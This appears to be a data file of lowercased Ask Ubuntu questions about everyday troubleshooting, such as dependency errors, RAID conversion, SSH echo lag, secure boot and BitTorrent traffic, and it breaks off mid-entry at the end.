341162	unresolved gstreamer dependencies	i am new to ubuntu , and i am trying to install gstreamer on ubuntu 12.04.3lts upgraded from super os 11.10 ( a repackaging of ubuntu 11.10 with more apps and plugins ex : vlc and wine ) but am getting the following error : the following packages have unmet dependencies : gstreamer0.10-plugins-bad : depends : libass4 ( > = 0.9.7 ) but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.4 is to be installed depends : libcairo2 ( > = 1.2.4 ) but 1.10.2-6.1ubuntu3 is to be installed depends : libcdaudio1 ( > = 0.99.12p2 ) but it is not going to be installed depends : libcelt0-0 ( > = 0.7.1 ) but it is not going to be installed depends : libcurl3-gnutls ( > = 7.16.2-1 ) but 7.22.0-3ubuntu4.2 is to be installed depends : libdca0 but it is not going to be installed depends : libdirac-encoder0 but it is not going to be installed depends : libdirectfb-1.2-9 but it is not going to be installed depends : libdvdnav4 but it is not going to be installed depends : libdvdread4 but it is not going to be installed depends : libfaad2 but it is not going to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.32.3-0ubuntu1 is to be installed depends : libgme0 ( > = 0.5.5 ) but it is not going to be installed depends : libgsm1 ( > = 1.0.13 ) but 1.0.13-3 is to be installed depends : libgstreamer-plugins-bad0.10-0 ( = 0.10.22.3-2ubuntu2.2 ) but 0.10.22.3-2ubuntu2.2 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.36 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.36 ) but 0.10.36-1ubuntu1 is to be installed depends : libkate1 ( > = 0.4.1 ) but it is not going to be installed depends : libmimic0 but it is not going to be installed depends : libmms0 ( > = 0.4 ) but it is not going to be installed depends : libmodplug1 but it is not going to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but 2:0.1~r459-1ubuntu1 is to be installed depends : libofa0 ( > = 0.9.3 ) but it is not going to be installed depends : libopenal1 ( > = 1:1.13 ) but 1:1.13-4ubuntu3 is to be installed depends : libopenspc0 but it is not going to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.46-3ubuntu4 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.36.1-0ubuntu1 is to be installed depends : librtmp0 ( > = 2.3 ) but 2.4~20110711.gitc28f1bab-1 is to be installed depends : libschroedinger-1.0-0 ( > = 1.0.9 ) but 1.0.11-1 is to be installed depends : libslv2-9 ( > = 0.6.4-1~ ) but it is not going to be installed depends : libsndfile1 ( > = 1.0.20 ) but 1.0.25-4 is to be installed depends : libsoundtouch0 but it is not going to be installed depends : libspandsp2 ( > = 0.0.6~pre18 ) but it is not going to be installed depends : libssl1.0.0 ( > = 1.0.0 ) but 1.0.1-4ubuntu5.10 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is to be installed depends : libvo-aacenc0 ( > = 0.1.0~rc1 ) but it is not going to be installed depends : libvo-amrwbenc0 but it is not going to be installed depends : libvpx1 ( > = 1.0.0 ) but 1.0.0-1 is to be installed depends : libwildmidi1 ( > = 0.2.3 ) but it is not going to be installed depends : libxvidcore4 ( > = 1.2.2 ) but it is not going to be installed depends : libzbar0 ( > = 0.10 ) but it is not going to be installed depends : libzvbi0 ( > = 0.2.11 ) but it is not going to be installed . please what can i do , i 've tried sudo apt-get clean & & sudo apt-get update and change the server option to main server , but to no avail .
341163	print screen button is not working	i am using ubuntu 13.04 and as a shell , gnome 3 . after i have updated ubuntu to 13.04 , the print screen button does nothing , though in the system settings at the keyboard shortcuts , in the screenshot section i have the following : i have even tried to make my custom shortcut to gnome-screenshot , but it still does n't work . the only way i can take a screenshot is by pressing alt+f2 and then typing `` gnome-screenshot '' , or typing this in the terminal . it is weird that in unity the print screen button works .
341168	installing 13.04 with windows 8 - secure boot failed	i have a sony laptop with uefi , secureboot and windows 8 . i read ubuntu uefi recommendations , then freed some 35 gb on system hdd and installed ubuntu 13.04 64 bit in efi mode , keeping windows 8 . after succesfull install , system booted into windows 8 only , and i used boot-repair as recommended . boot-repair said that all is ok and here is his log : http : //paste.ubuntu.com/6061646 but now system can not boot totally . only thing i see is `` secure boot failed/operating system is invalid '' what can i do next to repair ubuntu and windows boot ?
341170	expand raid array	i 'm pretty new to raid , so please forgive my silly question . i have an ubuntu server 12.04 x64 installed on a pc having 4 hdds . during raid setup i selected raid10 and ( my ignorance ) choose 2 active hdds and 2 spare hdds . i 'm pretty sure it 's not the optimal configuration and probably i should have selected 4 active hdds . running cat /proc/mdstat i get md1 : active raid10 sdb2 [ 1 ] sdd2 [ 3 ] ( s ) sdc2 [ 2 ] ( s ) sda2 [ 0 ] 948736 blocks super 1.2 2 near-copies [ 2/2 ] [ uu ] md0 : active raid10 sdb1 [ 1 ] sdd1 [ 3 ] ( s ) sdc1 [ 2 ] ( s ) sda1 [ 0 ] 311619072 blocks super 1.2 2 near-copies [ 2/2 ] [ uu ] unused devices : < none > is there a way i can convert spare disks to active disks ? i tried using mdadm -- grow /dev/md1 -- raid-devices=4 , but got this answer mdadm : raid10 can only be changed to raid0
341176	xubuntu xterm strange lag/echo issue with ssh	i have a xubuntu box and using its terminal everything is fine locally ; but when i ssh to any server , the remote echo seems to be holding the last line until a key is pressed or the window is resized . in long output commands , only the first few lines are output ( i.e . find see test below ) . the issue is not present locally but will affect all utilities that rely on ssh , i.e . git , scp . randomly ssh sessions are closed even while processes are running and displaying output ( which is not updated unless keys are pressed repeatedly ) . in the screencast at http : //www.tmg.it/files/funnyterm.ogv , all commands are ended with a return ; i wait 5 seconds between commands . as you can see , the line with my prompt is shown only once i start typing again . tests i performed : booting from a live ubuntu 13.04 on a usb stick shows the same problem ! booting from a live ubuntu 12.04 on a usb stick works just fine booting from a live xubuntu 13.04 on a usb stick shows the same problem ! connecting with either wifi or lan shows the same issue in a window , the output is updated if i resize it pressing right arrow , or any other non-character keys will update as well same issue appears in a full screen console opened with ctrl-alt-f1 using another terminal i.e . aterm did not solve the issue deleting the .bashrc and .bash_profile locally and remotely did n't solve the issue . the issue appears with several remote centos both 32 and 64 bits v5.8 5.9 and 6 ; remote ubuntu 10.04.4 lts . scp tests : - scp remotefile localfile works if file < mtu . - tried fiddling with mtu , setting to several values between 1000 and 1600 - no success . find tests : in a ssh connection , find on a folder with many files will stop after a few lines of output . pressing the return key 3-4 times shows the next few lines . i started monitoring tx excessive retries and invalid misc from iwconfig , and see that `` invalid misc '' and `` excessive retries '' go up nicely with every few returns : system is up to date xubuntu 13.04 amd64 with lamp stack running on samsung rc530-s05it ( i7/6gb ram/60gb hdd partition + an extra ssd drive ) . i first noticed the issue when there was only lamp + eclipse installed and can reproduce it booting from a live distro ( same version ) . other systems in the network do not suffer from this issue ( update ! the mac started to show this same issue too ! ) . on this pc , centos runs fine in a vm and so does windows 7 both with putty and cygwin , plus any non-13.04 ( x ) ubuntu distributions from usb/iso . 13.04 ( x ) ubuntu fails even booting from a live usb stick . output of commands , iwconfig $ echo `` # find in ssh connection '' ; date + '' % h : % m : % s '' ; iwconfig 2 > nul | grep misc # find in ssh connection 14:22:56 tx excessive retries:695 invalid misc:273 missed beacon:0 # find in ssh connection.. after a few returns were pressed in the terminal : 14:23:07 tx excessive retries:697 invalid misc:281 missed beacon:0 $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' zzz-guests '' mode : managed frequency:2.462 ghz access point : a4 : b1 : e9:97:72 : ed bit rate=65 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=62/70 signal level=-48 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:582 invalid misc:209 missed beacon:0 the following block is the output of iwconfig on the ubuntu 12.04 where ssh works fine , after a huge find command completed : wlan0 ieee 802.11bgn essid : '' zzz-guests '' mode : managed frequency:2.462 ghz access point : a4 : b1 : e9:97:72 : ed bit rate=65 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:4 invalid misc:65 missed beacon:0 ( on this 12.04 ubuntu , lspci shows the exact same network drivers and versions being loaded as xubuntu 13.04 ) some misc info from my system cat /etc/lsb-release ; uname -a lspci -nnk | grep -ia2 net rfkill list all lsmod nm-tool lsmod | grep rt2 sudo cat /var/log/syslog | grep -e rt2 -e firmware -e wpa -e wlan -e etork | tail -n75 $ cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' ubuntu 13.04 '' linux osiris 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ lspci -nnk | grep -ia2 net 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 130 [ 8086:0896 ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 130 bgn [ 8086:5005 ] kernel driver in use : iwlwifi 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : samsung electronics co ltd device [ 144d : c0c1 ] kernel driver in use : r8169 ric @ osiris : ~ $ rfkill list all 0 : samsung-wlan : wireless lan soft blocked : no hard blocked : no ... 3 : phy0 : wireless lan soft blocked : no hard blocked : no $ lsmod module size used by pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 23479 0 vboxdrv 320372 3 vboxnetadp , vboxnetflt , vboxpci parport_pc 28152 0 ppdev 17073 0 rfcomm 42641 16 bnep 18036 2 binfmt_misc 17500 1 snd_hda_codec_hdmi 36906 1 snd_hda_codec_realtek 78399 1 joydev 17377 0 arc4 12615 2 snd_hda_intel 39619 3 snd_hda_codec 136498 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel iwldvm 241872 0 mac80211 606457 1 iwldvm snd_hwdep 13602 1 snd_hda_codec snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel coretemp 13355 0 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi kvm_intel 132891 0 kvm 443165 1 kvm_intel snd_rawmidi 30180 1 snd_seq_midi i915 600349 3 uvcvideo 80847 0 snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi videobuf2_vmalloc 13056 1 uvcvideo nouveau 943184 0 ghash_clmulni_intel 13259 0 aesni_intel 55399 1 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi videobuf2_memops 13202 1 videobuf2_vmalloc ttm 83187 1 nouveau aes_x86_64 17255 1 aesni_intel drm_kms_helper 49394 2 i915 , nouveau xts 12885 1 aesni_intel lrw 13257 1 aesni_intel snd_timer 29425 2 snd_pcm , snd_seq gf128mul 14951 2 lrw , xts videobuf2_core 40513 1 uvcvideo ablk_helper 13597 1 aesni_intel videodev 129260 2 uvcvideo , videobuf2_core iwlwifi 173516 1 iwldvm btusb 22474 0 cryptd 20373 3 ghash_clmulni_intel , aesni_intel , ablk_helper lp 17759 0 drm 286028 6 ttm , i915 , drm_kms_helper , nouveau microcode 22881 0 cfg80211 510937 3 iwlwifi , mac80211 , iwldvm psmouse 95905 0 bluetooth 228667 22 bnep , btusb , rfcomm snd 68876 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device samsung_laptop 14532 0 serio_raw 13215 0 mei 41158 0 parport 46345 3 lp , ppdev , parport_pc video 19390 3 i915 , samsung_laptop , nouveau mxm_wmi 13021 1 nouveau wmi 19070 2 mxm_wmi , nouveau i2c_algo_bit 13413 2 i915 , nouveau mac_hid 13205 0 lpc_ich 17061 0 soundcore 12680 1 snd hid_generic 12540 0 usbhid 47074 0 hid 101002 2 hid_generic , usbhid r8169 67466 0 ahci 25731 5 libahci 31364 1 ahci $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ zzz-guests ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : dc : a9:71:96:81:92 capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) zzz : infra , 00:1b:2f:94 : ed : be , freq 2427 mhz , rate 54 mb/s , strength 99 wpa wpa2 *zzz-guests : infra , a4 : b1 : e9:97:72 : ed , freq 2462 mhz , rate 54 mb/s , strength 72 wpa wpa2 ipv4 settings : address : 192.168.1.64 prefix : 24 ( 255.255.255.0 ) sudo cat /var/log/syslog | grep -e rt2 -e firmware -e wpa -e wlan -e etork | tail -n75 gateway : 192.168.1.254 dns : 192.168.1.254 $ sudo cat /var/log/syslog | grep -e rt2 -e firmware -e wpa -e wlan -e etork | tail -n75 sep 7 14:04:26 osiris networkmanager [ 1281 ] : < info > ( wlan0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] sep 7 14:04:26 osiris networkmanager [ 1281 ] : < info > policy set 'zzz-guests ' ( wlan0 ) as default for ipv4 routing and dns . sep 7 14:04:28 osiris networkmanager [ 1281 ] : < info > activation ( wlan0 ) successful , device activated . sep 7 14:04:44 osiris networkmanager [ 1281 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . sep 7 14:04:44 osiris networkmanager [ 1281 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... sep 7 14:04:44 osiris networkmanager [ 1281 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... sep 7 14:04:44 osiris networkmanager [ 1281 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . sep 7 14:04:58 osiris wpa_supplicant [ 1376 ] : wlan0 : wpa : group rekeying completed with a4 : b1 : e9:97:72 : ed [ gtk=tkip ] sep 7 14:11:37 osiris wpa_supplicant [ 1376 ] : dbus : wpa_dbus_get_object_properties : failed to get object properties : ( org.freedesktop.dbus.error.failed ) failed to parse wpa ie sep 7 14:11:37 osiris wpa_supplicant [ 1376 ] : dbus : failed to construct signal sep 7 14:14:58 osiris wpa_supplicant [ 1376 ] : wlan0 : wpa : group rekeying completed with a4 : b1 : e9:97:72 : ed [ gtk=tkip ] sep 7 14:17:37 osiris wpa_supplicant [ 1376 ] : dbus : wpa_dbus_get_object_properties : failed to get object properties : ( org.freedesktop.dbus.error.failed ) failed to parse wpa ie sep 7 14:17:37 osiris wpa_supplicant [ 1376 ] : dbus : failed to construct signal sep 7 14:24:57 osiris wpa_supplicant [ 1376 ] : wlan0 : wpa : group rekeying completed with a4 : b1 : e9:97:72 : ed [ gtk=tkip ] output of commands , stty here is the output of stty -a , both local and after ssh to a remote server , both in xubuntu 13.04 ( ssh has issues ) and from ubuntu 12.04 live ( which works ) : local console ( xubuntu 13.04 ) : $ stty -a speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = m-^ ? ; eol2 = m-^ ? ; swtch = m-^ ? ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 hupcl -cstopb cread -clocal -crtscts -ignbrk brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke ssh to a remote server ( centos 5.9 ) from xubuntu 13.04 : $ stty -a speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke ssh to a different server ( ubuntu 10 ) from xubuntu 13.04 : $ stty -a speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = m-^ ? ; eol2 = m-^ ? ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 local console on ubuntu 12.04.2 lts : $ stty -a speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = m-^ ? ; eol2 = m-^ ? ; swtch = m-^ ? ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 hupcl -cstopb cread -clocal -crtscts -ignbrk brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke remote server ( centos 5.9 ) from ubuntu 12.04.2 $ stty -a speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt cygwin ssh on windows 7 - > centos 5.9 $ stty -a speed 38400 baud ; rows 24 ; columns 100 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke mac osx 10.6.8 lflags : icanon isig iexten echo echoe -echok echoke -echonl echoctl -echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo -extproc iflags : -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8 -ignbrk brkint -inpck -ignpar -parmrk oflags : opost onlcr -oxtabs -onocr -onlret cflags : cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow -dtrflow -mdmbuf cchars : discard = ^o ; dsusp = ^y ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; erase = ^ ? ; intr = ^c ; kill = ^u ; lnext = ^v ; min = 1 ; quit = ^\ ; reprint = ^r ; start = ^q ; status = ^t ; stop = ^s ; susp = ^z ; time = 0 ; werase = ^w ; 12.04 ssh to centos 5.9 stty -g 500:5 : bf:8a3b:3:1c:7f:15:4:0:1:0:11:13:1a:0:12 : f:17:16:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0 13.04 ssh to centos 5.9 stty -g 500:5 : bf:8a3b:3:1c:7f:15:4:0:1:0:11:13:1a:0:12 : f:17:16:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0 ( stty -g output is identical ) ( this question was originally asked on http : //superuser.com/questions/640348/xubuntu-xterm-lag-echo-issue-with-ssh )
341177	disk mounted shows wrong size in df , and appears empty	i 'm on ubuntu 12.04 lts this is my fstab uuid=dcd55b7f-3157-4e75-9372-bcab5b0ac7cf / ext4 defaults , discard 0 0 /dev/sdc1 /mnt/data auto defaults 0 0 the problem is on /dev/sdc1 ( ext4 ) . at boot it is mounted correctly but with df -h it shows the wrong size and the disk appears to be empty . if i do umount /dev/sdc1 and then mount -a it works , the disk has the right size and the data appears . if i reboot the problem appears again . thanks .
341178	how do i get details about a package which is n't installed ?	how can i get some details about a package without installing it , ( eg . the description and version number ) like in synaptic or aptitude . the command dpkg -s package does not work , with this error . it works for installed packages , though dpkg-query : package 'package ' is not installed and no information is available
341183	'libpostproc ' requires 'libavutil = 51.22.1 '	i get the following error when i ./configure vlc source : configure : error : package 'libpostproc ' requires 'libavutil = 51.22.1' but version of libavutil is 52.38.100 . pass -- disable-postproc to ignore this error . as i looked for libavutil in my system i found the following packages inside : /usr/lib/i386-linux-gnu/ /usr/lib/i386-linux-gnu/libavutil.a /usr/lib/i386-linux-gnu/libavutil.so.51 /usr/lib/i386-linux-gnu/libavutil.so /usr/lib/i386-linux-gnu/libavutil.so.51.22.1 still i wonder why this error prompts ! as you see libavutil.so.51.22 is already inside this directory , then what is it saying that 52.38.100 is installed ? i am seriously confused , anyone please guide me to resolve this . cheers , update : i ran ./configure -- disable-postproc this way configure finished successfully . i get the following error when running make though : make [ 6 ] : entering directory `/home/saman/packages/vlc-2.0.8/modules/codec/avcodec' cc libavcodec_plugin_la-avcodec.lo avcodec.c : in function 'opendecoder ' : avcodec.c:249:30 : warning : comparison between signed and unsigned integer expressions [ -wsign-compare ] avcodec.c:278:14 : error : 'avcodeccontext ' has no member named 'dsp_mask' avcodec.c:281:18 : error : 'avcodeccontext ' has no member named 'dsp_mask'
341188	package is n't found after adding ppa in apt-cache , why ?	i am running 13.04 . the system is new , just installed . i want to install package zeromq3 from ppa https : //launchpad.net/~chris-lea/+archive/zeromq ? field.series_filter=raring . i do : sudo add-apt-repository ppa : chris-lea/zeromq sudo apt-get update no problems , no errors . checking the repository was added : cat /etc/apt/sources.list.d/chris-lea-zeromq-raring.list deb http : //ppa.launchpad.net/chris-lea/zeromq/ubuntu raring main # deb-src http : //ppa.launchpad.net/chris-lea/zeromq/ubuntu raring main checking the key was added : sudo apt-key list ... lot of lines ... pub 1024r/c7917b12 2010-05-17 uid launchpad chrislea the key is correct , the same which is on the ppa page . the repo was added to sources . looks good ! trying to install : apt-cache search zeromq3 this command returns nothing . i was trying in virtualbox and on real machine . i ran sudo apt-get clean and sudo apt-get autoclean . i also tried another ppa from launchapd but that does not work either . what 's wrong ? why ca n't the package be found ?
341189	why does ctrl+\ ( backslash ) not kill the process any more ?	for a while , ctrl+\ worked like a charm . now , it does not kill the process . in fact it does nothing . an example how it does not work : adi @ ebi : ~ $ sleep 10 ^c [ exited with 130 ] adi @ ebi : ~ $ sleep 10 ^\^\^\^\^\^\^\^\^\^\^\ adi @ ebi : ~ $ ctrl+c stops sleep as usual , but ctrl+\ does not , but it should , right ?
341192	errors when installing rtcheck	i 'm trying to install `` rtcheck '' . i do sudo apt-get install rtcheck , but during the installation an error occurs . andrea @ andrea-k53sd : / $ sudo apt-get install rtcheck [ sudo ] password for andrea : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package rtcheck andrea @ andrea-k53sd : / $ what does this mean ?
341195	sticky keys : how do i know a key is stuck ?	i 'm trying to get myself to use sticky keys ( to prevent rsi ) , but i often find i 've pressed ctrl and then changed my mind , and i 'm not sure if hitting e.g . q will insert a q or quit the program âś is there a way to get an onscreen indicator for whether a key is `` stuck '' ? alternatively , is there a way to get sirupy keys , ie . keys that stick when you hit them but then let go if there 's no more keys within n seconds ?
341199	project to have virtual box guest support by default	how do i package ubuntu for virtual box in a ready-to-eat format so i can foist it on every person who owns a laptop ? ( that way they have no barrier to use it : neither in the install or the required rebooting for dual boot ) ubuntu has very poor out-of-the-box performance as a guest in virtual box due to the high dependence on hardware acceleration for it 's all important eyecandy/perfectly-purple-pixels . for a usable system the virtualbox vm needs to be configured to allow 3d acceleration and ubuntu needs specific drivers to benefit from this . how can i go about packaging the whole shebang so noobs get a ready to eat package ? target group : noobs who show the slightest curiosity ; acquaintances and distant family susceptible to cajoling , coercion and emotional blackmail ; anyone with a new machine . more technical users can configure vbox machines themselves , setup dualboots or just ditch windows like i did . i posted a question on launchpad a while ago but that is gathering dust.. ( https : //answers.launchpad.net/ubuntu/+question/232004 ) ideally i would like the ubuntu iso to contain the drivers to support virtual box , since it too is an important `` platform '' . my questions are : the drivers and extensions are under some gpl incompatible opensource license ( cdl i think ) is there any technical/legal problem in including them on the iso ? ( there are ready to use debs on the official ubuntu repo already that use dkms+source code ) how can i file a request to include them on the iso ? i had no luck on launchpad , either on my own or with my request for guidance . update : the question has no reduced to `` how do i ask for the virtualbox-guest-additions package to be included by default in the ubuntu 13.10 iso ? ''
341202	ubuntu mobile os	android os = java windows phone = c # apple = objective c ubuntu os = ? which language is used for developing mobile app in ubuntu mobile os ?
341203	calculate how long i was sitting at my computer	is there a way to find out , how long i was sitting at my computer all together ? maybe the time the mouse did move or keyboard input is recorded somewhere ? i tried rsi-break , which seems to record something like that , but it is quite confusing .
341207	ubuntu-13.04-desktop-amd64 not installing alongside windows 8	i am trying to install ubantu alongside windows 8 but as soon as i choose the option install inside windows 8 it shows a black screen with this written on it : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate ... then it asks me to remove the cd drive n press enter then it restarts n again windows 8 is booted directly secure boot is disabled and it cant be enabled any solutions ? ? ?
341208	changing unity desktop icon text color	a white desktop wallpaper is not an option in unity desktop currently . because the text color does not seem changeable . how do we accomplish this ?
341211	why does transmission bittorrent client still send and receive with zero download/upload speed !	this is my network traffic with vnstat : ^ r | r | r r | r r | r r | r r | r r | r r | r r r r | t rt rt rt rt rt rt rt -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - > | 15 16 17 18 19 20 21 22 23 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 h rx ( kib ) tx ( kib ) h rx ( kib ) tx ( kib ) h rx ( kib ) tx ( kib ) 15 0 0 23 23994 40915 07 1305794 175924 16 8487 1375 00 129206 203168 08 95179 98313 17 0 0 01 147492 192614 09 96384 109808 18 0 0 02 199779 192173 10 95519 112443 19 0 0 03 206705 204136 11 77934 89830 20 0 0 04 264584 205402 12 66171 69969 21 47189 55511 05 292691 206276 13 80901 88811 22 31564 53650 06 1048066 187709 14 5890 2730 from 00 to 07 i was downloading using transmission bittorent from 08 to 13 i put download/upload speed limit on zero and nothing was downloading and at 14 i closed transmission bittorrent there are two things i do not understand : why is there still network traffic from 07 to 13 while i limited speeds to zero ? i limited upload speed from 00 to 07 but bittorrent has uploaded about 200000 kib per hour somebody please explain me why is this happening ? p.s pausing torrents give same result as putting limit on speed , there is still traffic : vnstat while bittorrent is open and all are paused rx | tx -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- bytes 170 kib | 143 kib -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- max 68 kbit/s | 52 kbit/s average 48.57 kbit/s | 40.86 kbit/s min 36 kbit/s | 28 kbit/s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- packets 1562 | 1470 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- max 71 p/s | 68 p/s average 55 p/s | 52 p/s min 43 p/s | 39 p/s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- time 28 seconds now i closed the bittorrent and results rx | tx -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- bytes 3 kib | 4 kib -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- max 8 kbit/s | 4 kbit/s average 0.96 kbit/s | 1.28 kbit/s min 0 kbit/s | 0 kbit/s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- packets 32 | 40 -- -- -- -- -- -- -- 